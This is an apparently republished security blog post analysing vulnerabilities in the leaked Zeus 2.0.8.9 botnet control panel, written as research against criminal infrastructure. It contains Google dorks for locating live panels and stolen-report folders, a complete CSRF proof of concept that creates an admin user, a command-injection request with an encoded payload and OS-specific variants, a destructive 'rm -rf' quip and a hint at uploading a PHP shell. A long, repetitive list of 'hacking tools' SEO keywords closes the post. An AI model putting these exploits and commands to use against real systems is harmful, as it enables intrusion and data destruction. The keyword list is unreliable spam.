Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related word

1. Easy Hack Tools
2. Hacker
3. Pentest Automation Tools
4. Pentest Tools Alternative
5. Hacking Tools Online
6. Hacking Tools Github
7. Hacker Tools List
8. Underground Hacker Sites
9. Hack Apps
10. Hacks And Tools
11. Pentest Automation Tools
12. Hacker Tool Kit
13. Pentest Tools Framework
14. Pentest Box Tools Download
15. Pentest Tools For Ubuntu
16. Hack Tools Mac
17. Pentest Tools For Mac
18. Best Hacking Tools 2020
19. Hacker Tools Software
20. Hacker Techniques Tools And Incident Handling
21. Hack Tools For Pc
22. Hacker Tools Github
23. Pentest Tools Review
24. Tools 4 Hack
25. Hacking Tools For Windows 7
26. Install Pentest Tools Ubuntu
27. Hacker Tools 2020
28. Hacker
29. Pentest Tools
30. Ethical Hacker Tools
31. Best Hacking Tools 2019
32. Hacking Tools For Kali Linux
33. Hacker
34. Hack Tools
35. Hacking Tools
36. How To Make Hacking Tools
37. New Hack Tools
38. Hacks And Tools
39. Blackhat Hacker Tools
40. Hack Tools Mac
41. Hacker Tools
42. Hack Tools
43. Pentest Tools Port Scanner
44. Pentest Tools Subdomain
45. Ethical Hacker Tools
46. Pentest Tools For Mac
47. Hacking Tools Online
48. Hacking Tools For Mac
49. New Hack Tools
50. Hacker Tool Kit
51. Hacking App
52. Hacking Tools 2019
53. Hacking Tools Name
54. Pentest Tools Online
55. Hacking Tools 2020
56. Easy Hack Tools
57. Pentest Tools For Windows
58. Hack Tools Pc
59. Pentest Tools Bluekeep
60. Hacker Tools 2019
61. Pentest Tools Alternative
62. Hacker Tools For Pc
63. Hacker Tools Github
64. Pentest Tools Find Subdomains
65. Hacking Tools Windows
66. Hacking Tools For Windows
67. Pentest Tools List
68. Hack Tools Pc
69. Pentest Tools Website Vulnerability
70. Hacker Techniques Tools And Incident Handling
71. Hacker Techniques Tools And Incident Handling
72. Hacker Tools Github
73. Hacker Tools
74. Pentest Tools Linux
75. Pentest Tools For Windows
76. Kik Hack Tools
77. Hacking Tools Software
78. Hacking Tools
79. Hack Tools Github
80. Hacks And Tools
81. How To Install Pentest Tools In Ubuntu
82. Hacking Tools Download
83. Top Pentest Tools
84. Hacker Tools For Mac
85. Hacker Tools Windows
86. Pentest Tools Windows
87. Hack Tools 2019
88. Hack Website Online Tool
89. Best Hacking Tools 2020
90. Bluetooth Hacking Tools Kali
91. How To Make Hacking Tools
92. Hacking Tools Kit
93. Pentest Tools Nmap
94. Hacker Tools 2019
95. Hacking Tools Online
96. Hack Tool Apk No Root
97. Best Hacking Tools 2019
98. Pentest Recon Tools
99. Best Hacking Tools 2020
100. Free Pentest Tools For Windows
101. Hack Website Online Tool
102. Hacker Tools Apk
103. Pentest Tools For Windows
104. Hacking Tools Download
105. Wifi Hacker Tools For Windows
106. Kik Hack Tools
107. Hacking Tools Online
108. Hacker Search Tools
109. Hacker Tools